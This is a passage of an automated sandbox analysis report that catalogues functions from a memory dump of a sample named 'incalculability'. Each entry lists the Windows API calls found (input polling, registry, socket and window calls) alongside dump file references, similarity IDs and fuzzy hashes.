                            • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: AddressProc$Library$FreeLoad
                            • String ID:
                            • API String ID: 2449869053-0
                            • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                            • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                            • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                            • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                            Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • GetCursorPos.USER32(?), ref: 004563A6
                            • ScreenToClient.USER32(?,?), ref: 004563C3
                            • GetAsyncKeyState.USER32(?), ref: 00456400
                            • GetAsyncKeyState.USER32(?), ref: 00456410
                            • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: AsyncState$ClientCursorLongScreenWindow
                            • String ID:
                            • API String ID: 3539004672-0
                            • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                            • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                            • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                            • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                            Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                            Download Yara Rule
                            APIs
                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                            • Sleep.KERNEL32(0000000A), ref: 0047D455
                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Interlocked$DecrementIncrement$Sleep
                            • String ID:
                            • API String ID: 327565842-0
                            • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                            • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                            • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                            • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                            Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                            Download Yara Rule
                            APIs
                            • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                            • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                            • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                            • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: PrivateProfile$SectionWrite$String
                            • String ID:
                            • API String ID: 2832842796-0
                            • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                            • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                            • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                            • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                            Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                            • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Enum$CloseDeleteOpen
                            • String ID:
                            • API String ID: 2095303065-0
                            • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                            • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                            • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                            • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                            Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                            Download Yara Rule
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 00436A24
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: RectWindow
                            • String ID:
                            • API String ID: 861336768-0
                            • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                            • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                            • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                            • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                            Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32 ref: 00449598
                              • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                            • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                            • _wcslen.LIBCMT ref: 0044960D
                            • _wcslen.LIBCMT ref: 0044961A
                            • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend$_wcslen$_wcspbrk
                            • String ID:
                            • API String ID: 1856069659-0
                            • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                            • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                            • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                            • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                            Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetCursorPos.USER32(?), ref: 004478E2
                            • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                            • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                            • GetCursorPos.USER32(00000000), ref: 0044796A
                            • TrackPopupMenuEx.USER32(02E16400,00000000,00000000,?,?,00000000), ref: 00447991
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CursorMenuPopupTrack$Proc
                            • String ID:
                            • API String ID: 1300944170-0
                            • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                            • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                            • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                            • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                            Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                            Download Yara Rule
                            APIs
                            • GetClientRect.USER32(?,?), ref: 004479CC
                            • GetCursorPos.USER32(?), ref: 004479D7
                            • ScreenToClient.USER32(?,?), ref: 004479F3
                            • WindowFromPoint.USER32(?,?), ref: 00447A34
                            • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Client$CursorFromPointProcRectScreenWindow
                            • String ID:
                            • API String ID: 1822080540-0
                            • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                            • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                            • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                            • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                            Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                            Download Yara Rule
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 00447C5D
                            • ScreenToClient.USER32(?,?), ref: 00447C7B
                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                            • EndPaint.USER32(?,?), ref: 00447D13
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ClientPaintRectRectangleScreenViewportWindow
                            • String ID:
                            • API String ID: 659298297-0
                            • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                            • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                            • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                            • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                            Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                            Download Yara Rule
                            APIs
                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                              • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                              • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                              • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                              • Part of subcall function 00440D98: SendMessageW.USER32(02E11B70,000000F1,00000000,00000000), ref: 00440E6E
                              • Part of subcall function 00440D98: SendMessageW.USER32(02E11B70,000000F1,00000001,00000000), ref: 00440E9A
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Window$EnableMessageSend$LongShow
                            • String ID:
                            • API String ID: 142311417-0
                            • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                            • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                            • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                            • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                            Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                            • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                            • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                            • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                            Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                            Download Yara Rule
                            APIs
                            • IsWindowVisible.USER32(?), ref: 00445879
                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                            • _wcslen.LIBCMT ref: 004458FB
                            • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                            • String ID:
                            • API String ID: 3087257052-0
                            • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                            • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                            • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                            • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                            Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                            • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                            • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                            • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                            • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                            • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ErrorLast$closesocketconnectinet_addrsocket
                            • String ID:
                            • API String ID: 245547762-0
                            • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                            • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                            • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                            • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                            Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                            Download Yara Rule
                            APIs
                            • DeleteObject.GDI32(00000000), ref: 004471D8
                            • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                            • SelectObject.GDI32(?,00000000), ref: 00447228
                            • BeginPath.GDI32(?), ref: 0044723D
                            • SelectObject.GDI32(?,00000000), ref: 00447266
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Object$Select$BeginCreateDeletePath
                            • String ID:
                            • API String ID: 2338827641-0
                            • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                            • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                            • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                            • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
